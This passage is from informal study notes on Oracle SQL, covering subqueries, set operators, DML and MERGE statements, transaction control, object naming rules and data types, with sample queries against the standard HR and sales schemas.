<span id="cb7-15"><a aria-hidden="true" href="#cb7-15" tabindex="-1"></a> <span class="kw">CROSS</span> <span class="kw">JOIN</span> table2; <span class="op">-></span> ANSI SQL<span class="ch">:1999</span> <span class="kw">cross</span> <span class="kw">join</span> syntax</span></code></pre></div>
<ol start="25" type="1">
<li><p>SQL*Plus presents any identically named columns as headings. SQL
Developer appends an underscore and number to each shared column name
and uses it as the heading</p></li>
<li><p>JOIN ON takes multiple conditions using AND -> SELECT * FROM
EMPLOYEES E JOIN DEPARTMENTS D ON E.DEPARTMENT_ID=D.DEPARTMENT_ID AND
E.MANAGER_ID=D.MANAGER_ID;</p></li>
<li><p>departments d outer join employees e -> INVALID SYNTAX ->
Need to specify type of OUTER join</p></li>
<li><p>CROSS JOIN cannot have a JOIN condition -> Syntax
Error</p></li>
<li><p>SELECT D.DEPARTMENT_ID FROM EMPLOYEES JOIN DEPARTMENTS D USING
(DEPARTMENT_ID); Columns in USING Clause when used in SELECT should NOT
HAVE QUALIFIERS</p></li>
<li><p>SELECT * FROM LOCATIONS L RIGHT OUTER JOIN COUNTRIES C ON
(L.COUNTRY_ID=C.COUNTRY_ID) WHERE L.COUNTRY_ID is NULL</p>
<p>.. Joins both the tables and gives a combined result with the
additional records in COUNTRIES which are not used in LOCATIONs table ..
Specifying the WHERE condition removes the rows that have an ENTRY in
the LOCATIONS table .. This gives the records which are in the COUNTRIES
table without any ENTRY in the LOCATIONS table</p></li>
<li><p>IF THERE IS A OUTER JOIN, FIRST JOIN the TABLE and apply the
CONDITIONS to get the results</p></li>
</ol>
<h3 id="chapter-8">Chapter 8</h3>
<ol type="1">
<li>A scalar subquery is a query that returns exactly one value: a
single row, with a single column.</li>
<li>A subquery is a query that is nested inside a SELECT, INSERT,
UPDATE, or DELETE statement or inside another subquery</li>
<li>Subqueries can be nested to an unlimited depth in a FROM clause but
to “only” 255 levels in a WHERE clause. They can be used in the SELECT
list and in the FROM, WHERE, and HAVING clauses of a query.</li>
<li>Using NOT IN is fraught with problems because of the way SQL handles
NULLs. As a general rule, do not use NOT IN unless you are certain that
the result set will not include a NULL.</li>
<li>If the subquery is going to return more than one row, then the
comparison operator must be able to accept multiple values. These
operators are IN, NOT IN, ANY, and ALL. If the comparison operator is
EQUAL, GREATER THAN, or LESS THAN (which each can only accept one
value), the parent query will fail.</li>
<li>An extension of the use of subqueries as an alternative to a join is
to enable the star transformation often needed in data warehouse
applications</li>
</ol>
<div class="sourceCode" id="cb8"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb8-1"><a aria-hidden="true" href="#cb8-1" tabindex="-1"></a><span class="kw">FROM</span></span>
<span id="cb8-2"><a aria-hidden="true" href="#cb8-2" tabindex="-1"></a><span class="kw">and</span> p.product<span class="op">=</span>’Books’</span>
<span id="cb8-3"><a aria-hidden="true" href="#cb8-3" tabindex="-1"></a><span class="kw">and</span> b.country<span class="op">=</span>’Germany’</span>
<span id="cb8-4"><a aria-hidden="true" href="#cb8-4" tabindex="-1"></a><span class="kw">and</span> c.channel<span class="op">=</span>’Internet’;</span>
<span id="cb8-5"><a aria-hidden="true" href="#cb8-5" tabindex="-1"></a></span>
<span id="cb8-6"><a aria-hidden="true" href="#cb8-6" tabindex="-1"></a><span class="kw">TO</span></span>
<span id="cb8-7"><a aria-hidden="true" href="#cb8-7" tabindex="-1"></a><span class="kw">select</span> <span class="op">..</span>. <span class="kw">from</span> sales</span>
<span id="cb8-8"><a aria-hidden="true" href="#cb8-8" tabindex="-1"></a><span class="kw">where</span> prod_code <span class="kw">in</span> (<span class="kw">select</span> prod_code <span class="kw">from</span> products <span class="kw">where</span> product<span class="op">=</span>’Books’)</span>
<span id="cb8-9"><a aria-hidden="true" href="#cb8-9" tabindex="-1"></a><span class="kw">and</span> buy_code <span class="kw">in</span> (<span class="kw">select</span> buy_code <span class="kw">from</span> buyers <span class="kw">where</span> country<span class="op">=</span>’Germany’)</span>
<span id="cb8-10"><a aria-hidden="true" href="#cb8-10" tabindex="-1"></a><span class="kw">and</span> chan_code <span class="kw">in</span> (<span class="kw">select</span> chan_code <span class="kw">from</span> channels <span class="kw">where</span> channel<span class="op">=</span>’Internet);</span></code></pre></div>
<ol start="7" type="1">
<li>STAR TRANSFORMATION There is an instance initialization parameter,
STAR_TRANSFORMATION_ENABLED, which (if set to true) will permit the
Oracle query optimizer to re-write code into star queries.</li>
<li>Subqueries can also be used in the FROM clause, where they are
sometimes referred to as inline views</li>
<li>select (select max(salary) from employees) * (select
max(commission_pct) from employees) / 100 from dual; .. In this usage,
the SELECT list used to project columns is being populated with the
results of the subqueries. A subquery used in this manner must be
scalar, or the parent query will fail with an error.</li>
<li>USAGE of Sub Query happens in WHERE clause, FROM clause, SELECT
clause, DML Statements</li>
</ol>
<div class="sourceCode" id="cb9"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">into</span> sales_hist <span class="kw">select</span> <span class="op">*</span> <span class="kw">from</span> sales <span class="kw">where</span> <span class="dt">date</span> <span class="op">></span> <span class="fu">sysdate</span><span class="op">-</span><span class="dv">1</span>;</span>
<span id="cb9-2"><a aria-hidden="true" href="#cb9-2" tabindex="-1"></a><span class="kw">update</span> employees <span class="kw">set</span> salary <span class="op">=</span> (<span class="kw">select</span> <span class="fu">avg</span>(salary) <span class="kw">from</span> employees);</span>
<span id="cb9-3"><a aria-hidden="true" href="#cb9-3" tabindex="-1"></a><span class="kw">delete</span> <span class="kw">from</span> departments <span class="kw">where</span> department_id <span class="kw">not</span> <span class="kw">in</span> (<span class="kw">select</span> department_id <span class="kw">from</span> employees);</span></code></pre></div>
<ol start="11" type="1">
<li>A subquery can be used to select rows for insertion but not in a
VALUES clause of an INSERT statement.</li>
<li>Usage examples</li>
</ol>
<div class="sourceCode" id="cb10"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">into</span> dates <span class="kw">select</span> <span class="fu">sysdate</span> <span class="kw">from</span> dual; <span class="op">-></span> CORRECT</span>
<span id="cb10-2"><a aria-hidden="true" href="#cb10-2" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">into</span> dates (date_col) <span class="kw">values</span> (<span class="kw">select</span> <span class="fu">sysdate</span> fom dual); <span class="op">-></span> <span class="kw">NOT</span> CORRECT</span></code></pre></div>
<ol start="13" type="1">
<li>The single-row subquery returns one row. A special case is the
scalar subquery, which returns a single row with one column. .. The
comparison operators valid for single-row subqueries are =, >, >=,
<, <=, and <>. .. The comparison operators valid for
multiple-row subqueries are IN, NOT IN, ANY, and ALL.</li>
<li>Correlated subqueries can be a very inefficient construct, due to
the need for repeated execution of the subquery. Always try to find an
alternative approach.</li>
<li>Usage of ALL</li>
</ol>
<div class="sourceCode" id="cb11"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb11-1"><a aria-hidden="true" href="#cb11-1" tabindex="-1"></a><span class="kw">select</span> last_name <span class="kw">from</span> employees <span class="kw">where</span> salary <span class="op">></span> <span class="kw">all</span> (<span class="kw">select</span> salary <span class="kw">from</span> employees <span class="kw">where</span> department_id<span class="op">=</span><span class="dv">80</span>);</span>
<span id="cb11-2"><a aria-hidden="true" href="#cb11-2" tabindex="-1"></a></span>
<span id="cb11-3"><a aria-hidden="true" href="#cb11-3" tabindex="-1"></a><span class="op"><</span> <span class="kw">ANY</span> <span class="kw">less</span> <span class="kw">than</span> <span class="kw">the</span> highest</span>
<span id="cb11-4"><a aria-hidden="true" href="#cb11-4" tabindex="-1"></a><span class="op">></span> <span class="kw">ANY</span> more <span class="kw">than</span> <span class="kw">the</span> lowest</span>
<span id="cb11-5"><a aria-hidden="true" href="#cb11-5" tabindex="-1"></a><span class="op">=</span> <span class="kw">ANY</span> equivalent <span class="kw">to</span> <span class="kw">IN</span></span>
<span id="cb11-6"><a aria-hidden="true" href="#cb11-6" tabindex="-1"></a><span class="op">></span> <span class="kw">ALL</span> more <span class="kw">than</span> <span class="kw">the</span> highest</span>
<span id="cb11-7"><a aria-hidden="true" href="#cb11-7" tabindex="-1"></a><span class="op"><</span> <span class="kw">ALL</span> <span class="kw">less</span> <span class="kw">than</span> <span class="kw">the</span> lowest</span></code></pre></div>
<ol start="16" type="1">
<li>“NOT >=” -> NOT or ! cannot be used in Conjunction with other
comparison operators</li>
<li>SUB QUERIES can be used in SELECT, FROM, WHERE, GROUP BY, HAVING
CANNOT be used in ORDER BY</li>
<li>If a subquery returns NULL, then the comparison will also return
NULL, meaning that no rows will be retrieved.</li>
</ol>
<h3 id="chapter-9">Chapter 9</h3>
<ol type="1">
<li>There is a significant deviation from the ISO standard for SQL here,
in that ISO SQL uses EXCEPT where Oracle uses MINUS, but the
functionality is identical.</li>
<li>Oracle provides three set operators: UNION, INTERSECT, and MINUS.
UNION can be qualified with ALL</li>
<li>Union options .. UNION - Returns the combined rows from two queries,
sorting them and removing duplicates. .. UNION ALL - Returns the
combined rows from two queries without sorting or removing duplicates.
.. INTERSECT - Returns only the rows that occur in both queries’ result
sets, sorting them and removing duplicates. .. MINUS - Returns only the
rows in the first result set that do not appear in the second result
set, sorting them and removing duplicates.</li>
<li>Although pending enhancements to ISO SQL will give INTERSECT a
higher priority than the others, there is currently no priority of one
operator over another. .. To override this precedence, based on the
order in which the operators appear, you can use parentheses:</li>
<li>The columns in the queries that make up a compound query can have
different names, but the output result set will use the names of the
columns in the first query</li>
<li>Each query in a compound query will project its own list of selected
columns. .. These lists must have the same number of elements, be
nominated in the same sequence, and be of broadly similar data type. ..
They do not have to have the same names (or column aliases), nor do they
need to come from the same tables (or subqueries). .. If the column
names (or aliases) are different, the result set of the compound query
will have columns named as they were in the first query. .. While the
selected column lists do not have to be exactly the same data type, they
must be from the same data type group. .. DATE amd NUMBER in first query
should match with TIMESTAMP and INTEGER in second Query .. The result
set of the compound query will have columns with the higher level of
precision: in this case, they would be TIMESTAMP and NUMBER .. NO
IMPLICIT CASTING -> If the second query retrieved columns of type
VARCHAR2, the compound query would throw an error even if the string
variables could be resolved to legitimate date and numeric values.</li>
<li>UNION, MINUS, and INTERSECT will always combine the results sets of
the input queries, then sort the results to remove duplicate rows. The
sorting is based on all the columns, from left to right. .. If all the
columns in two rows have the same value, then only the first row is
returned in the compound result set</li>
<li>It is possible to put a single ORDER BY clause at the end of the
compound query. It is not possible to use ORDER BY in any of the queries
that make up the whole compound query, as this would disrupt the sorting
that is necessary to remove duplicates</li>
<li>UNION ALL -> the result sets of the two input queries will be
concatenated to form the result of the compound query .. Can’t use ORDER
BY in the individual queries; it can only appear at the end of the
compound query</li>
<li>If you know that there can be no duplicates between two tables, then
always use UNION ALL. Itsaves the database from doing a lot of
sorting</li>
<li>Remember: If padded with Spaces, then it takes precedence over
alphabets [conversion of CHAR to VARCHAR2]</li>
<li>INSTERSECT between CHAR and VARCHAR2 will not be equal [Exact number
of spaces is required in VARCHAR2 field]</li>
<li>A MINUS runs both queries, sorts the results, and returns only the
rows from the first result set that do not appear in the second result
set.</li>
<li>For Mismatching number of columns, we can use TO_CHAR(NULL)</li>
</ol>
<div class="sourceCode" id="cb12"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb12-1"><a aria-hidden="true" href="#cb12-1" tabindex="-1"></a><span class="kw">select</span> name,tail_length,<span class="fu">to_char</span>(<span class="kw">null</span>) <span class="kw">from</span> cats</span>
<span id="cb12-2"><a aria-hidden="true" href="#cb12-2" tabindex="-1"></a><span class="kw">union</span> <span class="kw">all</span></span>
<span id="cb12-3"><a aria-hidden="true" href="#cb12-3" tabindex="-1"></a><span class="kw">select</span> name,<span class="fu">to_char</span>(<span class="kw">null</span>),wing_span <span class="kw">from</span> birds;</span></code></pre></div>
<ol start="15" type="1">
<li>Without parentheses, the set operators will be applied in the
sequence in which they are specified</li>
<li>Using an ORDER BY class in SETS throws an Error</li>
<li>There is no problem with placing an ORDER BY clause at the end of
the compound query .. However, there might be a problem with adding a
aliased column in the order by class of the THREE or more Queries .. The
Alias declaration and the usage has to in SUCCESSIVE QUERIES else it
does not work.</li>
</ol>
<h3 id="chapter-10">Chapter 10</h3>
<ol type="1">
<li>MERGE can be thought of as a shortcut for executing either an INSERT
or an UPDATE or a DELETE, depending on some condition.</li>
<li>Final List of DML Statements are: SELECT, INSERT, UPDATE, DELETE,
MERGE</li>
<li>TRUNCATE is thought as a DML but actually is a DDL</li>
<li>There are much faster techniques than INSERT for populating a table
with large numbers of rows. These are the SQL*Loader utility, which can
upload data from files produced by an external feeder system, and
Datapump, which .. Can transfer data in bulk from one Oracle database to
another, either via disk files or through a network link.</li>
<li>One UPDATE statement can change rows in only one table, but it can
change any number of rows in that table.</li>
<li>MERGE was introduced with the SQL1999 standard, implemented by
Oracle in database release 9i.</li>
<li>UPSERT - Propritory SQL implementation of MERGE</li>
<li>A MERGE passes through the source data, for each row attempting to
locate a matching row in the target. .. If no match is found, a row can
be inserted; .. If a match is found, the matching row can be updated.
The release 10g enhancement means that the target row can even be
deleted, after being matched and updated.</li>
<li>Transactions, consisting of INSERT, UPDATE, and DELETE (or even
MERGE) commands can be made permanent (with a COMMIT) or reversed (with
a ROLLBACK). .. A TRUNCATE command, like any other DDL command, is
immediately permanent: it can never be reversed.</li>
<li>TRUNCATE is a DDL and NOT A DML because it cannot be controlled by
Transactions [(though within the database, they are in fact implemented
as transactions, but developers cannot control them]</li>
<li>Whereas a deletion may take some time (possibly hours, if there are
many rows in the table) a truncation will go through instantly. It makes
no difference whether the table contains one row or billions</li>
<li>DDL commands, such as TRUNCATE, will fail if there is any DML
command active on the table. A transaction will block the DDL command
until the DML command is terminated with a COMMIT or a ROLLBACK.</li>
<li>If the user attempting to execute the statement does not have the
relevant permissions on the tables to which it refers, the database will
return an error identical to that which would be returned if the object
did not exist. As far as the user is concerned, it does not exist</li>
<li>INSERT - insert into hr.regions values (10,‘Great Britain’); .. When
the database receives a statement using positional notation, it will
match the order of the values to the order in which the columns of the
table are defined.</li>
</ol>
<ol start="15" type="1">
<li>INSERT Performance</li>
</ol>
<div class="sourceCode" id="cb13"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb13-1"><a aria-hidden="true" href="#cb13-1" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">into</span> employees (employee_id, last_name, hire_date) <span class="kw">values</span> (<span class="dv">1000</span>,<span class="st">'WATSON'</span>,<span class="st">'03-Nov-07'</span>);</span>
<span id="cb13-2"><a aria-hidden="true" href="#cb13-2" tabindex="-1"></a><span class="kw">insert</span> <span class="kw">into</span> employees (employee_id, last_name, hire_date) <span class="kw">values</span> (<span class="dv">1000</span>,<span class="fu">upper</span>(<span class="st">'Watson'</span>),<span class="fu">to_date</span>(<span class="st">'03-Nov-07'</span>,<span class="st">'dd-mon-yy'</span>));</span></code></pre></div>
<pre><code>.. SECOND is better than the First, because of UPPER casing -> useful in sorting
.. to_date prevents the performance hit of implicit conversion</code></pre>
<ol start="16" type="1">
<li>Any SELECT statement, specified as a subquery, can be used as the
source of rows passed to an INSERT. This enables insertion of many rows.
.. Alternatively, using the VALUES clause will insert one row. The
values can be literals or prompted for as substitution variables.</li>
</ol>
<ol start="17" type="1">
<li>insert all</li>
</ol>
<div class="sourceCode" id="cb15"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb15-1"><a aria-hidden="true" href="#cb15-1" tabindex="-1"></a></span>
<span id="cb15-2"><a aria-hidden="true" href="#cb15-2" tabindex="-1"></a><span class="cf">when</span> <span class="dv">1</span><span class="op">=</span><span class="dv">1</span> <span class="cf">then</span></span>
<span id="cb15-3"><a aria-hidden="true" href="#cb15-3" tabindex="-1"></a> <span class="kw">into</span> emp_no_name (department_id,job_id,salary,commission_pct,hire_date)</span>
<span id="cb15-4"><a aria-hidden="true" href="#cb15-4" tabindex="-1"></a> <span class="kw">values</span> (department_id,job_id,salary,commission_pct,hire_date)</span>
<span id="cb15-5"><a aria-hidden="true" href="#cb15-5" tabindex="-1"></a></span>
<span id="cb15-6"><a aria-hidden="true" href="#cb15-6" tabindex="-1"></a><span class="cf">when</span> department_id <span class="op"><></span> <span class="dv">80</span> <span class="cf">then</span></span>
<span id="cb15-7"><a aria-hidden="true" href="#cb15-7" tabindex="-1"></a> <span class="kw">into</span> emp_non_sales (employee_id,department_id,salary,hire_date)</span>
<span id="cb15-8"><a aria-hidden="true" href="#cb15-8" tabindex="-1"></a> <span class="kw">values</span> (employee_id,department_id,salary,hire_date)</span>
<span id="cb15-9"><a aria-hidden="true" href="#cb15-9" tabindex="-1"></a></span>
<span id="cb15-10"><a aria-hidden="true" href="#cb15-10" tabindex="-1"></a><span class="cf">when</span> department_id <span class="op">=</span> <span class="dv">80</span> <span class="cf">then</span></span>
<span id="cb15-11"><a aria-hidden="true" href="#cb15-11" tabindex="-1"></a> <span class="kw">into</span> emp_sales (employee_id,salary,commission_pct,hire_date)</span>
<span id="cb15-12"><a aria-hidden="true" href="#cb15-12" tabindex="-1"></a> <span class="kw">values</span> (employee_id,salary,commission_pct,hire_date)</span>
<span id="cb15-13"><a aria-hidden="true" href="#cb15-13" tabindex="-1"></a></span>
<span id="cb15-14"><a aria-hidden="true" href="#cb15-14" tabindex="-1"></a><span class="kw">select</span> employee_id,department_id,job_id,salary,commission_pct,hire_date</span>
<span id="cb15-15"><a aria-hidden="true" href="#cb15-15" tabindex="-1"></a><span class="kw">from</span> employees <span class="kw">where</span> hire_date <span class="op">></span> <span class="fu">sysdate</span> <span class="op">-</span> <span class="dv">30</span>;</span></code></pre></div>
<p>NOTE: ALL -> means all the tables will be updated for matching
conditions. IF “ALL” is not there, only the first matching WHEN will be
filled</p>
<ol start="18" type="1">
<li><code>UPDATE table SET column=value [,column=value...] [WHERE condition];</code></li>
<li><em>UPDATE table</em></li>
</ol>
<div class="sourceCode" id="cb16"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb16-1"><a aria-hidden="true" href="#cb16-1" tabindex="-1"></a><span class="kw">UPDATE</span> <span class="kw">table</span></span>
<span id="cb16-2"><a aria-hidden="true" href="#cb16-2" tabindex="-1"></a> <span class="kw">SET</span> <span class="kw">column</span><span class="op">=</span>[subquery] [,<span class="kw">column</span><span class="op">=</span>subquery<span class="op">..</span>.]</span>
<span id="cb16-3"><a aria-hidden="true" href="#cb16-3" tabindex="-1"></a> <span class="kw">WHERE</span> <span class="kw">column</span> <span class="op">=</span> (subquery) [<span class="kw">AND</span> <span class="kw">column</span><span class="op">=</span>subquery<span class="op">..</span>.] ;</span></code></pre></div>
<ol start="20" type="1">
<li><p>There is a rigid restriction on the subqueries using update
columns in the SET clause: the subquery must return a scalar value. ..
If there were more than one it would fail with the error ->
ORA-01427: single-row subquery returns more than one row. .. The
subqueries used to SET column values must be scalar subqueries. .. The
subqueries used to select the rows must also be scalar, unless they use
the IN predicate.</p></li>
<li><p>DELETE FROM table [WHERE condition];</p></li>
<li><p>TRUNCATE is a DDL (Data Definition Language) command. TRUNCATE
completely empties the table. .. There is no concept of row selection,
as there is with a DELETE. .. It operates within the data dictionary and
affects the structure of the table, not the contents of the table. ..
However, the change it makes to the structure has the side effect of
destroying all the rows in the table.</p></li>
<li><p>The data dictionary tracks how much of the space allocated to the
table has been used. This is done with the high water mark. .. The high
water mark is the last position in the last extent that has been used ..
Inserting rows into a table pushes the high water mark up. .. Deleting
them leaves the high water mark where it is; .. The space they occupied
remains assigned to the table but is freed up for inserting more
rows.</p></li>
<li><p>Truncating a table resets the high water mark. .. A truncation is
fast: virtually instantaneous, irrespective of whether the table has
many millions of rows or none.</p></li>
<li><p><code>TRUNCATE TABLE table;</code></p></li>
<li><p><em>Merge Into Query</em></p></li>
</ol>
<div class="sourceCode" id="cb17"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb17-1"><a aria-hidden="true" href="#cb17-1" tabindex="-1"></a><span class="kw">merge</span> <span class="kw">into</span> employees e <span class="kw">using</span> new_employees n</span>
<span id="cb17-2"><a aria-hidden="true" href="#cb17-2" tabindex="-1"></a> <span class="kw">on</span> (e.employee_id <span class="op">=</span> n.employee_id)</span>
<span id="cb17-3"><a aria-hidden="true" href="#cb17-3" tabindex="-1"></a> <span class="cf">when</span> matched <span class="cf">then</span></span>
<span id="cb17-4"><a aria-hidden="true" href="#cb17-4" tabindex="-1"></a> <span class="kw">update</span> <span class="kw">set</span> e.salary<span class="op">=</span>n.salary</span>
<span id="cb17-5"><a aria-hidden="true" href="#cb17-5" tabindex="-1"></a> <span class="cf">when</span> <span class="kw">not</span> matched <span class="cf">then</span></span>
<span id="cb17-6"><a aria-hidden="true" href="#cb17-6" tabindex="-1"></a> <span class="kw">insert</span> (employee_id,last_name,salary) <span class="kw">values</span> (n.employee_id,n.last_name,n.salary);</span></code></pre></div>
<ol start="26" type="1">
<li><p>ACID test: it must guarantee atomicity, consistency, isolation,
and durability. .. Atomicity states that all parts of a transaction must
complete or none of them. .. [Two updates must happen as a single
transaction] .. Consistency states that the results of a query must be
consistent with the state of the database at the time the query started.
.. [Updates should not be allowed when querying the table] .. The
principle of consistency requires that the database ensure that changed
values are not seen by the query [ORA-1555 snapshot too old] -> DB
Admin does not configure properly .. Isolation states that an incomplete
(that is, uncommitted) transaction must be invisible to the rest of the
world. .. Durability states that once a transaction completes, it must
be impossible for the database to lose it.</p></li>
<li><p>A session begins a transaction the moment it issues any INSERT,
UPDATE, or DELETE statement (but not a TRUNCATE, that is a DDL command,
not DML). .. The transaction continues through any number of further DML
commands until the session issues either a COMMIT or a ROLLBACK
statement</p></li>
<li><p>It is impossible to nest transactions. This can be done with
PL/SQL (Oracle’s proprietary third-generation language), but not with
industry-standard SQL.</p></li>
<li><p>The explicit transaction control statements are COMMIT, ROLLBACK,
and SAVEPOINT. .. The implicit ones are: … Issuing a DDL (CREATE, ALTER,
or DROP) or DCL (GRANT or REVOKE) statement … Exiting from the user tool
(SQL*Plus or SQL Developer or anything else) … If the client session
dies … If the system crashes</p></li>
<li><p>If a user starts a transaction by issuing a DML command and then
exits from the tool he is using without explicitly issuing either a
COMMIT or a ROLLBACK, the transaction will terminate, but whether it
terminates with a COMMIT or a ROLLBACK is entirely dependent on how the
tool is written</p></li>
<li><p>If a client’s session fails for some reason, the database will
always roll back the transaction. .. the user process can die or be
killed at the operating system level, .. the network connection to the
database server may go down, .. the machine where the client tool is
running can crash.</p></li>
<li><p>The behavior is that the session is killed, and an active
transaction is rolled back.</p></li>
<li><p>The SAVEPOINT command can be used to set markers that will stage
the action of a ROLLBACK, but the same transaction remains in progress
irrespective of the use of SAVEPOINT.</p></li>
<li><p>COMMIT;</p></li>
<li><p>ROLLBACK [TO SAVEPOINT savepoint] ;</p></li>
<li><p>A COMMIT is instantaneous, because it doesn’t really have to do
anything. The work has already been done. .. A ROLLBACK can be very
slow: it will usually take as long (if not longer) to reverse a
transaction than it took to make the changes in the first place. ..
Rollbacks are not good for database performance.</p></li>
<li><p>SAVEPOINT is used only for ROLLBACK and does not commit the
data</p></li>
<li><p>The SAVEPOINT command is not (yet) part of the official SQL
standard, so it may be considered good practice to avoid it in
production systems. .. It can be very useful in development, though,
when you are testing the effect of DML statements and walking through a
complex transaction step by step.</p></li>
<li><p>SET AUTOCOMMIT ON -> behavior in both tools so that every DML
statement commits immediately, in its own transaction.</p></li>
<li><p>SELECT FOR UPDATE -> select * from regions for
update;</p></li>
<li><p>The transaction is started implicitly with the first DML
statement executed. .. Until it is committed, it can be reversed with a
ROLLBACK</p></li>
<li><p>The FOR UPDATE clause will place a lock on all the rows
retrieved. .. No changes can be made to them by any session other than
that which issued the command, and therefore the subsequent updates will
succeed .. The locks placed by a FOR UPDATE clause will be held until
the session issuing the command issues a COMMIT or ROLLBACK.</p></li>
<li><p>If an UPDATE or DELETE command has a WHERE clause that gives it a
scope of several rows, what will happen if there is an error part way
through execution? The command is one of several in a multistatement
transaction. Whatever work the command had done before hitting the error
will be rolled back, but work done already by the transaction will
remain.</p></li>
<li><p>You want to insert a row and then update it. What sequence of
steps should you follow? SIMPLEST and BEST WAY: INSERT, UPDATE,
COMMIT</p></li>
<li><p>Creating savepoints and rolling back to them leave the
transaction in progress .. COMMIT and ROLLBACK are the commands to
terminate a transaction explicitly; TRUNCATE will do it
implicitly.</p></li>
</ol>
<h3 id="chapter-11">Chapter 11</h3>
<ol type="1">
<li><p>select object_type,count(object_type) from dba_objects group by
object_type order by object_type -> DBA_OBJECTS is a View</p></li>
<li><p>USER_OBJECTS -> objects owned by you ALL_OBJECTS -> objects
which you have been granted access</p></li>
<li><p>User SYS owns the data dictionary: a set of tables (in the SYS
schema) that define the database and its contents. .. SYS also owns
several hundred PL/SQL packages: code that is provided for the use of
database administrators and developers.</p></li>
<li><p>You update the data dictionary by running DDL commands (such as
CREATE TABLE), which provide a layer of abstraction between you and the
data dictionary itself. .. The SYSTEM schema stores various additional
objects used for administration and monitoring.</p></li>
<li><p>The user MDSYS stores the objects used by Oracle Spatial, an
option that extends the capabilities of the Oracle database to manage
geographical information.</p></li>
<li><p>The name may be from 1 to 30 characters long (with the exception
of database link names that may be up to 128 characters long). ..
Reserved words (such as SELECT) cannot be used as object names. .. All
names must begin with a letter from A to Z. .. The characters in a name
can only be letters, numbers, an underscore (_), the dollar sign ($), or
the hash symbol (#). .. Lowercase letters will be converted to
uppercase.</p></li>
<li><p>By enclosing the name within double quotes, all these rules (with
the exception of the length) can be broken, but to get to the object,
subsequently, it must always be specified with double quotes. .. Note
that the same restrictions also apply to column names</p></li>
<li><p>Tools such as SQL*Plus and SQL Developer will automatically
convert lowercase letters to uppercase unless the name is enclosed
within double quotes</p></li>
<li><p>While it is possible to use lowercase names and nonstandard
characters (even spaces), it is considered bad practice because of the
confusion it can cause.</p></li>
<li><p>Tables, views, and private synonyms -> form one namespace ..
Indexes and Constraints -> form one namespace .. Naming of objects
within a single namespace should be unique</p></li>
<li><p>On creation, the table will have been assigned a limited amount
of space (known as an extent) within the database.</p></li>
<li><p>Size of character sets .. VARCHAR2 - 1byte - 4KB .. NVARCHAR2 -
stored in alternative national language character set .. CHAR - Fixed
length 1 byte to 2KB</p></li>
<li><p>For ISO/ANSI compliance, you can specify a VARCHAR data type, but
any columns of this type will be automatically converted to VARCHAR2.
###= For Binary Data</p></li>
<li><p>RAW: 1 byte to 4KB</p></li>
<li><p>RAW data is not converted by Oracle Net from the database’s
character set to the user process’s character set on SELECT or the other
way on INSERT.</p></li>
</ol>
<p>###= For numeric data 1. NUMBER .. Precision can range from to 1 to
38, the scale can range from -84 to 127 .. If the scale is negative,
this has the effect of replacing the last digits of any number inserted
with zeros, which do not count toward the number of digits specified for
the precision. .. If the number of digits exceeds the precision, there
will be an error; .. if it is within the precision but outside the
scale, the number will be rounded (up or down) to the nearest value
within the scale</p>
<ol start="2" type="1">
<li>FLOAT -> This is an ANSI data type, floating-point number with
precision of 126 binary (or 38 decimal). Oracle also provides
BINARY_FLOAT and BINARY_DOUBLE as alternatives</li>
<li>INTEGER -> Equivalent to NUMBER, with scale zero.</li>
</ol>
<p>###= For date and time [Fixed Length] 1. DATE .. This is either
length zero, if the column is empty, or 7 bytes includes century, year,
month, day, hour, minute, and second - from January 1, 4712 BC to
December 31, 9999 AD. .. Using the TRUNC function on a date also has the
effect of setting the hours, minutes, and seconds to midnight 2.
TIMESTAMP .. length zero if the column is empty, or up to 11 bytes ..
Similar to DATE, but with precision of up to 9 decimal places for the
seconds, 6 places by default. .. TIMESTAMP WITH TIMEZONE The length may
be up to 13 bytes .. difference between two times by normalizing them to
UTC, even if the times are for different time zones .. TIMESTAMP WITH
LOCAL TIMEZONE The data is normalized to the database time zone on
saving. When retrieved, it is normalized to the time zone of the user
process selecting it. .. INTERVAL YEAR TO MONTH - period in years and
months between two DATEs or TIMESTAMPs .. INTERVAL DAY TO SECOND -
period in days and seconds between two DATEs or TIMESTAMPs</p>
<p>###= For Large Object Types 1. CLOB - size effectively unlimited: 4GB
multiplied by the database block size. 2. NCLOB - stored in the
alternative national language character set, one of the permitted
Unicode character sets. 3. BLOB - binary data that will not undergo
character set conversion by Oracle Net 4. BFILE - locator pointing to a
file stored on the operating system of the database server. 4GB 5. LONG
- Character data in the database character set, up to 2GB -> provided
by CLOB .. LONGs should not be used in a modern database,-> should be
converted to CLOB. .. There can only be one LONG column in a table 6.
LONG RAW - Binary data that will not be converted by Oracle Net. ..Any
LONG RAW columns should be converted to BLOBs.</p>
<p>###= ROWID data type 1. Value coded in base 64 that is the pointer to
the location of a row in a table. 2. Encrypted 3. Exact physical address
4. ROWID is an Oracle proprietary data type, not visible unless
specifically selected. 5. All examinees will be expected to know about
these data types: 6. VARCHAR2, CHAR, NUMBER, DATE, TIMESTAMP, INTERVAL,
RAW, LONG, LONG RAW, CLOB, BLOB, BFILE, and ROWID. 7. Detailed knowledge
will also be needed for VARCHAR2, NUMBER and DATE.</p>
<h3 id="chapter-11-continued">Chapter 11 Continued</h3>
<ol type="1">
<li>Tables can be stored in the database:</li>
<li>HEAP TABLES - A heap is variable length rows in random order</li>
<li>Advanced table structures .. Index organized tables - Store rows in
the order of an index key. .. Index clusters - Can denormalize tables in
parent-child relationships so that related rows from different table are
stored together. .. Hash clusters - Force a random distribution of rows,
which will break down any ordering based on the entry sequence. ..
Partitioned tables Store rows in separate physical structures, the
partitions, allocating rows according to the value of a column.</li>
</ol>
